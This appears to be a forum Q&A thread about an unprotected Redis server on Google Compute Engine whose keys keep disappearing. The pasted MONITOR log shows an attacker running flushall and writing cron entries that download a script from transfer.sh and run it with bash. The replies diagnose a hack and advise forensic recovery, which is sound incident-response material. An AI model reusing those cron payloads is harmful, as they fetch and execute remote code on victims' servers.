Google cloud compute engine redis auto keys remove

Question

Hi a strange issue happening. I have a google cloud instance running redis 4. Issue is Redis data/key auto remove after insertion within some random hrs or mins.

When I use redis-cli with MONITOR command I found following:

1525399477.663192 [0 122.114.179.53:47936] "info"

1525399487.102961 [0 122.114.179.53:55176] "COMMAND"

1525399487.546006 [0 122.114.179.53:55176] "flushall"

1525399488.214514 [0 122.114.179.53:55176] "set" "Backup1" "\t\n*/2 * * * * curl -s https://transfer.sh/mQnwD/tmp.CG62KOYFtW > .cmd && bash .cmd\n\t"

1525399488.435296 [0 122.114.179.53:55176] "set" "Backup2" "\t\n*/5 * * * * wget -O .cmd https://transfer.sh/mQnwD/tmp.CG62KOYFtW && bash .cmd\n\t"

1525399488.661485 [0 122.114.179.53:55176] "set" "Backup3" "\t\n*/10 * * * * lynx -source https://transfer.sh/mQnwD /tmp.CG62KOYFtW > .cmd && bash .cmd\n\t"

I have no idea about this IP Address : 122.114.179.53

Thanks

Looks like your Redis is open to the world w/o a password... someone's trying hack your server. — Itamar Haber

Pol Arroyo Pol Arroyo · Accepted Answer · 2018-05-04T14:52:34

It seems that your Google Compute Engine instance has been hacked.

I strongly recommend you to stop it, take a snapshot of the disk and create a new instances with the snapshot of the affected instance as a secondary disk to perform a forensic analysis.

Google cloud compute engine redis auto keys remove

1 Answers